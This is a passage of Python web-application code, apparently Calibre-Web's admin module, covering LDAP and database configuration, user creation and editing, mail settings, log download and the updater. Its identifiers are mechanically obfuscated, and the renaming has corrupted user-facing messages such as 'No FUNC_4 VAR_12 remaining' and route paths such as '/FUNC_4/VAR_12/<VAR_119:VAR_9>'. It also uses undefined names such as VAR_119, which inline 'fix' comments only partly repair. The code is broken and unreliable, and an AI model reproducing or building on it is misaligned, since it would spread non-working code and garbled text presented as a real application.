    VAR_83 |= FUNC_39(VAR_16, "config_ldap_openldap")
    VAR_83 |= FUNC_38(VAR_16, "config_ldap_encryption")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_cacert_path")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_cert_path")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_key_path")
    FUNC_41(VAR_16, "config_ldap_group_name")
    if VAR_16.get("config_ldap_serv_password", "") != "":
        # only overwrite the stored password when a new one was entered
        VAR_83 |= 1
        config.set_from_dictionary(VAR_16, "config_ldap_serv_password", base64.b64encode, encode='UTF-8')
    config.save()
    # --- mandatory base settings -------------------------------------------
    if not config.config_ldap_provider_url \
            or not config.config_ldap_port \
            or not config.config_ldap_dn \
            or not config.config_ldap_user_object:
        return VAR_83, FUNC_50(_('Please Enter a LDAP Provider, '
                                 'Port, DN and User Object Identifier'))
    # --- service account requirements depend on the auth method ------------
    if config.config_ldap_authentication > constants.LDAP_AUTH_ANONYMOUS:
        if config.config_ldap_authentication > constants.LDAP_AUTH_UNAUTHENTICATE:
            if not config.config_ldap_serv_username or not bool(config.config_ldap_serv_password):
                return VAR_83, FUNC_50(_('Please Enter a LDAP Service Account and Password'))
        else:
            if not config.config_ldap_serv_username:
                return VAR_83, FUNC_50(_('Please Enter a LDAP Service Account'))
    # --- filter sanity: exactly one %s placeholder, balanced parentheses ---
    if config.config_ldap_group_object_filter:
        if config.config_ldap_group_object_filter.count("%s") != 1:
            return VAR_83, \
                FUNC_50(_('LDAP Group Object Filter Needs to Have One "%s" Format Identifier'))
        if config.config_ldap_group_object_filter.count("(") != config.config_ldap_group_object_filter.count(")"):
            return VAR_83, FUNC_50(_('LDAP Group Object Filter Has Unmatched Parenthesis'))
    if config.config_ldap_user_object.count("%s") != 1:
        return VAR_83, \
            FUNC_50(_('LDAP User Object Filter needs to Have One "%s" Format Identifier'))
    if config.config_ldap_user_object.count("(") != config.config_ldap_user_object.count(")"):
        return VAR_83, FUNC_50(_('LDAP User Object Filter Has Unmatched Parenthesis'))
    if VAR_16.get("ldap_import_user_filter") == '0':
        config.config_ldap_member_user_object = ""
    else:
        if config.config_ldap_member_user_object.count("%s") != 1:
            return VAR_83, \
                FUNC_50(_('LDAP Member User Filter needs to Have One "%s" Format Identifier'))
        if config.config_ldap_member_user_object.count("(") != config.config_ldap_member_user_object.count(")"):
            return VAR_83, FUNC_50(_('LDAP Member User Filter Has Unmatched Parenthesis'))
    # --- certificate paths must all exist when any is set ------------------
    if config.config_ldap_cacert_path or config.config_ldap_cert_path or config.config_ldap_key_path:
        if not (os.path.isfile(config.config_ldap_cacert_path) and
                os.path.isfile(config.config_ldap_cert_path) and
                os.path.isfile(config.config_ldap_key_path)):
            return VAR_83, \
                FUNC_50(_('LDAP CACertificate, Certificate or Key Location is not Valid, '
                          'Please Enter Correct Path'))
    return VAR_83, None
@VAR_2.route("/ajax/simulatedbchange", methods=['POST'])
@login_required
@FUNC_0
def FUNC_46():
    # Dry-run of a library location change: report whether the path would
    # change and whether the target metadata.db is a valid calibre database,
    # without persisting anything.
    VAR_84, VAR_85 = FUNC_47()
    return Response(json.dumps({"change": VAR_84, "valid": VAR_85}), mimetype='application/json')
def FUNC_47():
    # Compute (library-path-changed?, target-db-valid?) from the posted form
    # without applying anything. A trailing "/metadata.db" (or "\metadata.db")
    # on the submitted directory is stripped first.
    VAR_4 = request.form.to_dict()
    VAR_16 = {}
    VAR_16['config_calibre_dir'] = re.sub(r'[\\/]metadata\.db$',
                                          '',
                                          VAR_4['config_calibre_dir'],
                                          flags=re.IGNORECASE).strip()
    VAR_84 = config.config_calibre_dir != VAR_16["config_calibre_dir"] and config.config_calibre_dir
    VAR_85 = calibre_db.check_valid_db(VAR_16["config_calibre_dir"], ub.app_DB_path)
    return VAR_84, VAR_85
def FUNC_48():
    # Apply a calibre-library location change from the posted form: validate
    # the target, optionally fetch metadata.db from Google Drive, and — when
    # the library actually changes — reset all per-book bookkeeping tables
    # that reference the old library's book ids.
    VAR_84 = False
    VAR_16 = request.form.to_dict()
    VAR_21 = None
    # strip a trailing "metadata.db" from the submitted directory
    VAR_16['config_calibre_dir'] = re.sub(r'[\\/]metadata\.db$',
                                          '',
                                          VAR_16['config_calibre_dir'],
                                          flags=re.IGNORECASE)
    try:
        VAR_84, VAR_85 = FUNC_47()
        VAR_21 = FUNC_42(VAR_16)
    except (OperationalError, InvalidRequestError):
        ub.session.rollback()
        VAR_0.error("Settings DB is not Writeable")
        FUNC_51(_("Settings DB is not Writeable"), VAR_21)
    try:
        VAR_107 = os.path.join(VAR_16['config_calibre_dir'], "metadata.db")
        if config.config_use_google_drive and is_gdrive_ready() and not os.path.exists(VAR_107):
            gdriveutils.downloadFile(None, "metadata.db", VAR_107)
            VAR_84 = True
    except Exception as ex:
        return FUNC_51('{}'.format(ex), VAR_21)
    if VAR_84 or not VAR_85 or not config.db_configured:
        if not calibre_db.setup_db(VAR_16['config_calibre_dir'], ub.app_DB_path):
            return FUNC_51(_('DB Location is not Valid, Please Enter Correct Path'),
                           VAR_21)
        # new library: old book ids are meaningless, wipe dependent tables
        ub.session.query(ub.Downloads).delete()
        ub.session.query(ub.ArchivedBook).delete()
        ub.session.query(ub.ReadBook).delete()
        ub.session.query(ub.BookShelf).delete()
        ub.session.query(ub.Bookmark).delete()
        ub.session.query(ub.KoboReadingState).delete()
        ub.session.query(ub.KoboStatistics).delete()
        ub.session.query(ub.KoboSyncedBooks).delete()
        ub.session_commit()
    FUNC_41(VAR_16, "config_calibre_dir")
    calibre_db.update_config(config)
    if not os.access(os.path.join(config.config_calibre_dir, "metadata.db"), os.W_OK):
        flash(_(u"DB is not Writeable"), category="warning")
    config.save()
    return FUNC_51(None, VAR_21)
def FUNC_49():
    """Persist the posted basic-configuration form.

    Copies each posted field into the config via the FUNC_38/39/40/41
    setters (presumably int/bool/checkbox/string — TODO confirm against
    their definitions), validates file paths and the LDAP/OAuth
    sub-forms, and stops the web server (restart) when a server-level
    option changed. Responds through FUNC_50.
    """
    VAR_83 = False  # "restart required" flag, set by server-level options
    VAR_16 = request.form.to_dict()
    try:
        VAR_83 |= FUNC_38(VAR_16, "config_port")
        VAR_83 |= FUNC_41(VAR_16, "config_trustedhosts")
        VAR_83 |= FUNC_41(VAR_16, "config_keyfile")
        if config.config_keyfile and not os.path.isfile(config.config_keyfile):
            return FUNC_50(_('Keyfile Location is not Valid, Please Enter Correct Path'))
        VAR_83 |= FUNC_41(VAR_16, "config_certfile")
        if config.config_certfile and not os.path.isfile(config.config_certfile):
            return FUNC_50(_('Certfile Location is not Valid, Please Enter Correct Path'))
        FUNC_40(VAR_16, "config_uploading")
        FUNC_40(VAR_16, "config_unicode_filename")
        # Toggling anonymous browsing only forces a restart under LDAP login.
        VAR_83 |= (FUNC_40(VAR_16, "config_anonbrowse")
                   and config.config_login_type == constants.LOGIN_LDAP)
        FUNC_40(VAR_16, "config_public_reg")
        FUNC_40(VAR_16, "config_register_email")
        VAR_83 |= FUNC_40(VAR_16, "config_kobo_sync")
        FUNC_38(VAR_16, "config_external_port")
        FUNC_40(VAR_16, "config_kobo_proxy")
        if "config_upload_formats" in VAR_16:
            # Deduplicate and lower-case the comma separated extension list.
            VAR_16["config_upload_formats"] = ','.join(
                helper.uniq([VAR_17.lstrip().rstrip().lower() for VAR_17 in VAR_16["config_upload_formats"].split(',')]))
            FUNC_41(VAR_16, "config_upload_formats")
            constants.EXTENSIONS_UPLOAD = config.config_upload_formats.split(',')
        FUNC_41(VAR_16, "config_calibre")
        FUNC_41(VAR_16, "config_converterpath")
        FUNC_41(VAR_16, "config_kepubifypath")
        VAR_83 |= FUNC_38(VAR_16, "config_login_type")
        if config.config_login_type == constants.LOGIN_LDAP:
            VAR_20, VAR_71 = FUNC_45(VAR_16)
            if VAR_71:
                return VAR_71
            VAR_83 |= VAR_20
        FUNC_39(VAR_16, "config_remote_login")
        if not config.config_remote_login:
            # Remote login disabled: invalidate all outstanding login tokens.
            ub.session.query(ub.RemoteAuthToken).filter(ub.RemoteAuthToken.token_type == 0).delete()
        FUNC_39(VAR_16, "config_use_goodreads")
        FUNC_41(VAR_16, "config_goodreads_api_key")
        FUNC_41(VAR_16, "config_goodreads_api_secret")
        if services.goodreads_support:
            services.goodreads_support.connect(config.config_goodreads_api_key,
                                               config.config_goodreads_api_secret,
                                               config.config_use_goodreads)
        FUNC_38(VAR_16, "config_updatechannel")
        FUNC_39(VAR_16, "config_allow_reverse_proxy_header_login")
        FUNC_41(VAR_16, "config_reverse_proxy_login_header_name")
        if config.config_login_type == constants.LOGIN_OAUTH:
            VAR_83 |= FUNC_43(VAR_16)
        VAR_20, VAR_71 = FUNC_44(VAR_16)
        if VAR_71:
            return VAR_71
        VAR_83 |= VAR_20
        FUNC_41(VAR_16, "config_rarfile_location")
        if "config_rarfile_location" in VAR_16:
            VAR_124 = helper.check_unrar(config.config_rarfile_location)
            if VAR_124:
                return FUNC_50(VAR_124)
    except (OperationalError, InvalidRequestError):
        ub.session.rollback()
        VAR_0.error("Settings DB is not Writeable")
        FUNC_50(_("Settings DB is not Writeable"))
    config.save()
    if VAR_83:
        web_server.stop(True)
    return FUNC_50(None, VAR_83)
def FUNC_50(VAR_19=None, VAR_20=False):
    """Build the JSON reply for a basic-configuration save.

    On error (VAR_19 set) the persisted config is reloaded and a danger
    entry returned; otherwise a success entry. The payload also carries
    the reboot flag VAR_20 and the current upload-format list.
    """
    if VAR_19:
        VAR_0.error(VAR_19)
        config.load()  # discard the rejected in-memory changes
        entries = [{'type': "danger", 'message': VAR_19}]
    else:
        entries = [{'type': "success", 'message': _(u"Calibre-Web FUNC_6 updated")}]
    payload = {
        'result': entries,
        'reboot': VAR_20,
        'config_upload': config.config_upload_formats,
    }
    return Response(json.dumps(payload), mimetype='application/json')
def FUNC_51(VAR_19=None, VAR_21=None):
    """Render the database-configuration page.

    VAR_19: optional error message (reloads the persisted config).
    VAR_21: optional Google-Drive error text; when Drive is usable the
    available root folders are listed instead.
    """
    VAR_87 = not is_gdrive_ready()
    VAR_88 = []
    if not VAR_21 and config.config_use_google_drive:
        VAR_21 = gdriveutils.get_error_text()
    if VAR_21 and gdrive_support:
        VAR_0.error(VAR_21)
        VAR_21 = _(VAR_21)
        flash(VAR_21, category="error")
    else:
        if not VAR_87 and gdrive_support:
            VAR_88 = gdriveutils.listRootFolders()
    if VAR_19:
        VAR_0.error(VAR_19)
        config.load()
        flash(VAR_19, category="error")
    elif request.method == "POST" and not VAR_21:
        flash(_("Database Settings updated"), category="success")
    return render_title_template("config_db.html",
                                 config=config,
                                 show_authenticate_google_drive=VAR_87,
                                 gdriveError=VAR_21,
                                 VAR_88=VAR_88,  # fix: 'gdrivefolders' was an undefined leftover name
                                 VAR_1=VAR_1,    # fix: 'feature_support' was an undefined leftover name
                                 title=_(u"Database Configuration"), page="dbconfig")
def FUNC_52(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25):
    """Create a new user VAR_22 from posted form VAR_16.

    VAR_23/VAR_24/VAR_25 (languages, translations, kobo support) are only
    needed to re-render the form on validation errors. Commits the new
    user on success; flashes the failure reason otherwise.
    """
    VAR_22.default_language = VAR_16["default_language"]
    VAR_22.locale = VAR_16.get("locale", VAR_22.locale)
    # 'show_<n>' checkboxes encode the sidebar visibility bitmask.
    # fix: VAR_119 was an undefined name; route converters show it was `int`.
    VAR_22.sidebar_view = sum(int(key[5:]) for key in VAR_16 if key.startswith('show_'))
    if "show_detail_random" in VAR_16:
        VAR_22.sidebar_view |= constants.DETAIL_RANDOM
    VAR_22.role = constants.selected_roles(VAR_16)
    VAR_22.password = generate_password_hash(VAR_16["password"])
    try:
        if not VAR_16["name"] or not VAR_16["email"] or not VAR_16["password"]:
            VAR_0.info("Missing entries on new user")
            raise Exception(_(u"Please fill out all fields!"))
        VAR_22.email = check_email(VAR_16["email"])
        VAR_22.name = check_username(VAR_16["name"])
        if VAR_16.get("kindle_mail"):
            VAR_22.kindle_mail = valid_email(VAR_16["kindle_mail"])
        if config.config_public_reg and not check_valid_domain(VAR_22.email):
            VAR_0.info("E-mail: {} for new VAR_12 is not from valid domain".format(VAR_22.email))
            raise Exception(_(u"E-mail is not from valid domain"))
    except Exception as ex:
        flash(str(ex), category="error")
        # fix: kwarg values referenced undefined pre-obfuscation names
        # (content/translations/languages/kobo_support) -> use the parameters.
        return render_title_template("user_edit.html", FUNC_55=1, VAR_22=VAR_22,
                                     config=config,
                                     VAR_24=VAR_24,
                                     VAR_23=VAR_23, title=_(u"Add new user"), page="newuser",
                                     VAR_25=VAR_25, registered_oauth=VAR_97)
    try:
        VAR_22.allowed_tags = config.config_allowed_tags
        VAR_22.denied_tags = config.config_denied_tags
        VAR_22.allowed_column_value = config.config_allowed_column_value
        VAR_22.denied_column_value = config.config_denied_column_value
        VAR_22.kobo_only_shelves_sync = VAR_16.get("kobo_only_shelves_sync", 0) == "on"
        ub.session.add(VAR_22)
        ub.session.commit()
        flash(_(u"User '%(VAR_12)s' created", VAR_12=VAR_22.name), category="success")
        VAR_0.debug("User {} created".format(VAR_22.name))
        return redirect(url_for('admin.admin'))
    except IntegrityError:
        ub.session.rollback()
        VAR_0.error("Found an existing account for {} or {}".format(VAR_22.name, VAR_22.email))
        flash(_("Found an existing account for this e-mail address or name."), category="error")
    except OperationalError:
        ub.session.rollback()
        VAR_0.error("Settings DB is not Writeable")
        flash(_("Settings DB is not Writeable"), category="error")
def FUNC_53(VAR_22):
    """Delete user VAR_22 together with all their per-user rows.

    Refuses to delete the "Guest" account and refuses to remove the last
    remaining admin. Returns a translated success message on success;
    raises Exception with a translated message otherwise.
    """
    # Only proceed when at least one OTHER admin account exists.
    if ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
                                        ub.User.id != VAR_22.id).count():
        if VAR_22.name != "Guest":
            # Cascade-delete reading state, downloads and the user's shelves.
            ub.session.query(ub.ReadBook).filter(VAR_22.id == ub.ReadBook.user_id).delete()
            ub.session.query(ub.Downloads).filter(VAR_22.id == ub.Downloads.user_id).delete()
            for us in ub.session.query(ub.Shelf).filter(VAR_22.id == ub.Shelf.user_id):
                ub.session.query(ub.BookShelf).filter(us.id == ub.BookShelf.shelf).delete()
            ub.session.query(ub.Shelf).filter(VAR_22.id == ub.Shelf.user_id).delete()
            ub.session.query(ub.User).filter(ub.User.id == VAR_22.id).delete()
            ub.session_commit()
            VAR_0.info(u"User {} deleted".format(VAR_22.name))
            return(_(u"User '%(nick)s' deleted", nick=VAR_22.name))
        else:
            VAR_0.warning(_(u"Can't delete Guest User"))
            raise Exception(_(u"Can't delete Guest User"))
    else:
        VAR_0.warning(u"No FUNC_4 VAR_12 remaining, can't delete user")
        raise Exception(_(u"No FUNC_4 VAR_12 remaining, can't delete user"))
def FUNC_54(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25):
    """Apply a posted user-edit form to user VAR_22.

    Handles deletion, role/visibility bitmasks, the Kobo shelf-sync
    switch, language/locale and e-mail/name changes. VAR_23/VAR_24/VAR_25
    (languages, translations, kobo support) are needed to re-render the
    edit page on validation errors. Returns a response on early exit,
    '' after a (attempted) commit.
    """
    if VAR_16.get("delete"):
        try:
            flash(FUNC_53(VAR_22), category="success")
        except Exception as ex:
            VAR_0.error(ex)
            flash(str(ex), category="error")
        return redirect(url_for('admin.admin'))
    else:
        # Block removing the admin role from the last remaining admin.
        if not ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
                                                ub.User.id != VAR_22.id).count() and 'admin_role' not in VAR_16:
            VAR_0.warning("No FUNC_4 VAR_12 remaining, can't remove FUNC_4 role from {}".format(VAR_22.name))
            flash(_("No FUNC_4 VAR_12 remaining, can't remove FUNC_4 role"), category="error")
            return redirect(url_for('admin.admin'))
        if VAR_16.get("password"):
            VAR_22.password = generate_password_hash(VAR_16["password"])
        VAR_108 = VAR_22.is_anonymous
        VAR_22.role = constants.selected_roles(VAR_16)
        if VAR_108:
            VAR_22.role |= constants.ROLE_ANONYMOUS
        else:
            VAR_22.role &= ~constants.ROLE_ANONYMOUS
        # 'show_<n>' checkboxes encode the sidebar visibility bitmask.
        # fix: VAR_119 was an undefined name; route converters show it was `int`.
        VAR_109 = [int(k[5:]) for k in VAR_16 if k.startswith('show_')]
        VAR_110 = get_sidebar_config()
        for VAR_10 in VAR_110:
            VAR_125 = VAR_10['visibility']
            if VAR_125 in VAR_109 and not VAR_22.check_visibility(VAR_125):
                VAR_22.sidebar_view |= VAR_125
            elif VAR_125 not in VAR_109 and VAR_22.check_visibility(VAR_125):
                VAR_22.sidebar_view &= ~VAR_125
        if VAR_16.get("Show_detail_random"):
            VAR_22.sidebar_view |= constants.DETAIL_RANDOM
        else:
            VAR_22.sidebar_view &= ~constants.DETAIL_RANDOM
        VAR_111 = VAR_22.kobo_only_shelves_sync
        VAR_22.kobo_only_shelves_sync = int(VAR_16.get("kobo_only_shelves_sync") == "on") or 0  # fix: VAR_119 -> int
        if VAR_111 == 0 and VAR_22.kobo_only_shelves_sync == 1:
            # Switch turned on: mark existing shelves for syncing.
            kobo_sync_status.update_on_sync_shelfs(VAR_22.id)
        if VAR_16.get("default_language"):
            VAR_22.default_language = VAR_16["default_language"]
        if VAR_16.get("locale"):
            VAR_22.locale = VAR_16["locale"]
        try:
            if VAR_16.get("email", VAR_22.email) != VAR_22.email:
                VAR_22.email = check_email(VAR_16["email"])
            if VAR_16.get("name", VAR_22.name) != VAR_22.name:
                if VAR_16.get("name") == "Guest":
                    raise Exception(_("Guest Name can't be changed"))
                VAR_22.name = check_username(VAR_16["name"])
            if VAR_16.get("kindle_mail") != VAR_22.kindle_mail:
                VAR_22.kindle_mail = valid_email(VAR_16["kindle_mail"]) if VAR_16["kindle_mail"] else ""
        except Exception as ex:
            VAR_0.error(ex)
            flash(str(ex), category="error")
            # fix: kwarg values referenced undefined pre-obfuscation names
            # (translations/languages/kobo_support/content) -> locals/params.
            return render_title_template("user_edit.html",
                                         VAR_24=VAR_24,
                                         VAR_23=VAR_23,
                                         mail_configured=config.get_mail_server_configured(),
                                         VAR_25=VAR_25,
                                         FUNC_55=0,
                                         VAR_22=VAR_22,
                                         config=config,
                                         registered_oauth=VAR_97,
                                         title=_(u"Edit User %(nick)s", nick=VAR_22.name),
                                         page="edituser")
    try:
        ub.session_commit()
        flash(_(u"User '%(nick)s' updated", nick=VAR_22.name), category="success")
    except IntegrityError as ex:
        ub.session.rollback()
        VAR_0.error("An unknown error occurred while changing VAR_12: {}".format(str(ex)))
        flash(_(u"An unknown error occurred. Please try again later."), category="error")
    except OperationalError:
        ub.session.rollback()
        VAR_0.error("Settings DB is not Writeable")
        flash(_("Settings DB is not Writeable"), category="error")
    return ""
@VAR_2.route("/FUNC_4/VAR_12/new", methods=["GET", "POST"])
@login_required
@FUNC_0
def FUNC_55():
    """Render and process the "add new user" admin page."""
    VAR_22 = ub.User()
    VAR_23 = calibre_db.speaking_language()
    VAR_24 = [LC('en')] + babel.list_translations()
    VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
    if request.method == "POST":
        VAR_16 = request.form.to_dict()
        FUNC_52(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25)
    else:
        # Pre-fill the form with the configured defaults for new accounts.
        VAR_22.role = config.config_default_role
        VAR_22.sidebar_view = config.config_default_show
        VAR_22.locale = config.config_default_locale
        VAR_22.default_language = config.config_default_language
    # fix: kwarg values referenced undefined pre-obfuscation names
    # (content/translations/languages/kobo_support) -> use the locals.
    return render_title_template("user_edit.html", FUNC_55=1, VAR_22=VAR_22,
                                 config=config, VAR_24=VAR_24,
                                 VAR_23=VAR_23, title=_(u"Add new user"), page="newuser",
                                 VAR_25=VAR_25, registered_oauth=VAR_97)
@VAR_2.route("/FUNC_4/mailsettings")
@login_required
@FUNC_0
def FUNC_56():
    """Show the e-mail (SMTP/Gmail) server settings page."""
    VAR_22 = config.get_mail_settings()
    # fix: 'content' / 'feature_support' were undefined leftovers -> locals.
    return render_title_template("email_edit.html", VAR_22=VAR_22, title=_(u"Edit E-mail Server Settings"),
                                 page="mailset", VAR_1=VAR_1)
@VAR_2.route("/FUNC_4/mailsettings", methods=["POST"])
@login_required
@FUNC_0
def FUNC_57():
    """Persist the posted e-mail server settings.

    Three paths: invalidate a stored Gmail OAuth token, run the Gmail
    OAuth setup, or save classic SMTP settings. A "test" submit queues a
    test e-mail to the current user (VAR_62).
    """
    VAR_16 = request.form.to_dict()
    FUNC_38(VAR_16, "mail_server_type")
    if VAR_16.get("invalidate"):
        config.mail_gmail_token = {}
        try:
            # Tell SQLAlchemy the mutable JSON column changed in place.
            flag_modified(config, "mail_gmail_token")
        except AttributeError:
            pass
    elif VAR_16.get("gmail"):
        try:
            config.mail_gmail_token = services.gmail.setup_gmail(config.mail_gmail_token)
            flash(_(u"Gmail Account Verification Successful"), category="success")
        except Exception as ex:
            flash(str(ex), category="error")
            VAR_0.error(ex)
            return FUNC_56()
    else:
        FUNC_41(VAR_16, "mail_server")
        FUNC_38(VAR_16, "mail_port")
        FUNC_38(VAR_16, "mail_use_ssl")
        FUNC_41(VAR_16, "mail_login")
        FUNC_41(VAR_16, "mail_password")
        FUNC_41(VAR_16, "mail_from")
        # NOTE(review): VAR_119 is not defined anywhere visible; from the
        # route converters it appears to be a mangled builtin `int` — confirm.
        FUNC_38(VAR_16, "mail_size", lambda y: VAR_119(y)*1024*1024)
    try:
        config.save()
    except (OperationalError, InvalidRequestError):
        ub.session.rollback()
        VAR_0.error("Settings DB is not Writeable")
        flash(_("Settings DB is not Writeable"), category="error")
        return FUNC_56()
    if VAR_16.get("test"):
        if VAR_62.email:
            VAR_126 = send_test_mail(VAR_62.email, VAR_62.name)
            if VAR_126 is None:
                flash(_(u"Test e-mail queued for sending to %(email)s, please VAR_66 Tasks for result",
                        email=VAR_62.email), category="info")
            else:
                flash(_(u"There was an error sending the Test e-mail: %(res)s", res=VAR_126), category="error")
        else:
            flash(_(u"Please configure your e-mail address first..."), category="error")
    else:
        flash(_(u"E-mail server settings updated"), category="success")
    return FUNC_56()
# NOTE(review): the route converter name 'VAR_119' is also mangled (it was
# presumably 'int'); the route string is left untouched here — confirm.
@VAR_2.route("/FUNC_4/VAR_12/<VAR_119:VAR_9>", methods=["GET", "POST"])
@login_required
@FUNC_0
def FUNC_58(VAR_9):
    """Render / process the edit page for the user with id VAR_9."""
    # fix: undefined VAR_119 -> int (the id is an integer user id).
    VAR_22 = ub.session.query(ub.User).filter(ub.User.id == int(VAR_9)).first()  # type: ub.User
    if not VAR_22 or (not config.config_anonbrowse and VAR_22.name == "Guest"):
        flash(_(u"User not found"), category="error")
        return redirect(url_for('admin.admin'))
    VAR_23 = calibre_db.speaking_language(return_all_languages=True)
    VAR_24 = babel.list_translations() + [LC('en')]
    VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
    if request.method == "POST":
        VAR_16 = request.form.to_dict()
        VAR_86 = FUNC_54(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25)
        if VAR_86:
            return VAR_86
    # fix: kwarg values referenced undefined pre-obfuscation names
    # (translations/languages/content/kobo_support) -> use the locals.
    return render_title_template("user_edit.html",
                                 VAR_24=VAR_24,
                                 VAR_23=VAR_23,
                                 FUNC_55=0,
                                 VAR_22=VAR_22,
                                 config=config,
                                 registered_oauth=VAR_97,
                                 mail_configured=config.get_mail_server_configured(),
                                 VAR_25=VAR_25,
                                 title=_(u"Edit User %(nick)s", nick=VAR_22.name),
                                 page="edituser")
@VAR_2.route("/FUNC_4/resetpassword/<VAR_119:VAR_9>")
@login_required
@FUNC_0
def FUNC_59(VAR_9):
    """Reset the password of user VAR_9 and flash the outcome.

    reset_password returns (1, username) on success, (0, ...) on an
    unknown error, and another code when SMTP is not configured yet.
    """
    if VAR_62 is not None and VAR_62.is_authenticated:
        VAR_59, VAR_71 = reset_password(VAR_9)
        if VAR_59 == 1:
            VAR_0.debug(u"Password for VAR_12 %s reset", VAR_71)
            flash(_(u"Password for VAR_12 %(VAR_12)s reset", VAR_12=VAR_71), category="success")
        elif VAR_59 == 0:
            VAR_0.error(u"An unknown error occurred. Please try again later.")
            flash(_(u"An unknown error occurred. Please try again later."), category="error")
        else:
            VAR_0.error(u"Please configure the SMTP mail settings first...")
            flash(_(u"Please configure the SMTP mail settings first..."), category="error")
    return redirect(url_for('admin.admin'))
@VAR_2.route("/FUNC_4/logfile")
@login_required
@FUNC_0
def FUNC_60():
    """Show the log viewer with the app log and access log paths."""
    VAR_89 = {0: logger.get_logfile(config.config_logfile),
              1: logger.get_accesslogfile(config.config_access_logfile)}
    return render_title_template("logviewer.html",
                                 title=_(u"Logfile viewer"),
                                 accesslog_enable=config.config_access_log,
                                 log_enable=bool(config.config_logfile != logger.LOG_TO_STDOUT),
                                 VAR_89=VAR_89,  # fix: 'logfiles' was an undefined leftover name
                                 page="logfile")
@VAR_2.route("/ajax/VAR_0/<VAR_119:VAR_26>")
@login_required
@FUNC_0
def FUNC_61(VAR_26):
    """Stream the requested log (0 = application log, 1 = access log);
    an empty string for any other id."""
    getters = {
        0: lambda: logger.get_logfile(config.config_logfile),
        1: lambda: logger.get_accesslogfile(config.config_access_logfile),
    }
    getter = getters.get(VAR_26)
    if getter is None:
        return ""
    path = getter()
    return send_from_directory(os.path.dirname(path), os.path.basename(path))
@VAR_2.route("/FUNC_4/logdownload/<VAR_119:VAR_26>")
@login_required
@FUNC_0
def FUNC_62(VAR_26):
    """Download log VAR_26 (0 = app log, 1 = access log); 404 otherwise."""
    if VAR_26 == 0:
        VAR_113 = logger.get_logfile(config.config_logfile)
    elif VAR_26 == 1:
        VAR_113 = logger.get_accesslogfile(config.config_access_logfile)
    else:
        abort(404)
    if logger.is_valid_logfile(VAR_113):
        return debug_info.assemble_logfiles(VAR_113)
    abort(404)
@VAR_2.route("/FUNC_4/debug")
@login_required
@FUNC_0
def FUNC_63():
    """Send the assembled debug-information package to the admin."""
    return debug_info.send_debug()
@VAR_2.route("/get_update_status", methods=['GET'])
@login_required
@FUNC_0
def FUNC_64():
    """Ask the updater thread for available updates; '' when the
    updater feature is disabled."""
    if not VAR_1['updater']:
        return ''
    VAR_0.info(u"Update VAR_90 requested")
    return updater_thread.get_available_updates(request.method, VAR_58=get_locale())
@VAR_2.route("/get_updater_status", methods=['GET', 'POST'])
@login_required
@FUNC_0
def FUNC_65():
    """Start an update (POST with start=True) or report updater progress (GET).

    Returns a JSON object with 'status' (updater status code) and, when
    starting, 'text' (translated status messages keyed by code).
    """
    VAR_90 = {}
    if VAR_1['updater']:
        if request.method == "POST":
            VAR_98 = request.form.to_dict()
            if "start" in VAR_98 and VAR_98['start'] == 'True':
                # Translated progress texts, keyed by updater status code.
                # NOTE(review): this local VAR_130 shadows the name imported
                # from sqlalchemy at module level.
                VAR_130 = {
                    "1": _(u'Requesting update package'),
                    "2": _(u'Downloading update package'),
                    "3": _(u'Unzipping update package'),
                    "4": _(u'Replacing files'),
                    "5": _(u'Database connections are closed'),
                    "6": _(u'Stopping server'),
                    "7": _(u'Update finished, please press okay and reload page'),
                    "8": _(u'Update failed:') + u' ' + _(u'HTTP Error'),
                    "9": _(u'Update failed:') + u' ' + _(u'Connection error'),
                    "10": _(u'Update failed:') + u' ' + _(u'Timeout while establishing connection'),
                    "11": _(u'Update failed:') + u' ' + _(u'General error'),
                    "12": _(u'Update failed:') + u' ' + _(u'Update file could not be saved in temp dir'),
                    "13": _(u'Update failed:') + u' ' + _(u'Files could not be replaced during update')
                }
                VAR_90['text'] = VAR_130
                updater_thread.status = 0
                updater_thread.resume()
                VAR_90['status'] = updater_thread.get_update_status()
        elif request.method == "GET":
            try:
                VAR_90['status'] = updater_thread.get_update_status()
                if VAR_90['status'] == -1:
                    VAR_90['status'] = 7
            except Exception:
                VAR_90['status'] = 11
        return json.dumps(VAR_90)
    return ''
def FUNC_66(VAR_12, VAR_27):
    """Create a local account for LDAP user VAR_12 from LDAP details VAR_27.

    Returns (1, None) when a user was created, (0, None) when skipped
    (duplicate or bad e-mail), (0, message) on a hard failure.
    """
    VAR_91 = FUNC_69(VAR_12, config.config_ldap_user_object)
    try:
        VAR_114 = VAR_27[VAR_91][0].decode('utf-8')
    except KeyError as ex:
        VAR_0.error("Failed to extract LDAP VAR_12: %s - %s", VAR_12, ex)
        VAR_71 = _(u'Failed to extract at least One LDAP User')
        return 0, VAR_71
    # fix: VAR_18 was an undefined leftover of sqlalchemy's `func`.
    if ub.session.query(ub.User).filter(func.lower(ub.User.name) == VAR_114.lower()).first():
        VAR_0.warning("LDAP User %s Already in Database", VAR_27)
        return 0, None
    VAR_92 = ''
    if 'mail' in VAR_27:
        VAR_115 = VAR_27['mail'][0].decode('utf-8')
        if len(VAR_27['mail']) > 1:
            VAR_92 = VAR_27['mail'][1].decode('utf-8')
    else:
        VAR_0.debug('No Mail Field Found in LDAP Response')
        VAR_115 = VAR_114 + '@email.com'
    try:
        VAR_115 = check_email(VAR_115)
    except Exception as ex:
        VAR_0.warning("LDAP Email Error: {}, {}".format(VAR_27, ex))
        return 0, None
    VAR_22 = ub.User()
    VAR_22.name = VAR_114
    VAR_22.password = ''  # dummy password which will be replaced by ldap one
    VAR_22.email = VAR_115
    VAR_22.kindle_mail = VAR_92
    # New accounts inherit all configured defaults and restrictions.
    VAR_22.default_language = config.config_default_language
    VAR_22.locale = config.config_default_locale
    VAR_22.role = config.config_default_role
    VAR_22.sidebar_view = config.config_default_show
    VAR_22.allowed_tags = config.config_allowed_tags
    VAR_22.denied_tags = config.config_denied_tags
    VAR_22.allowed_column_value = config.config_allowed_column_value
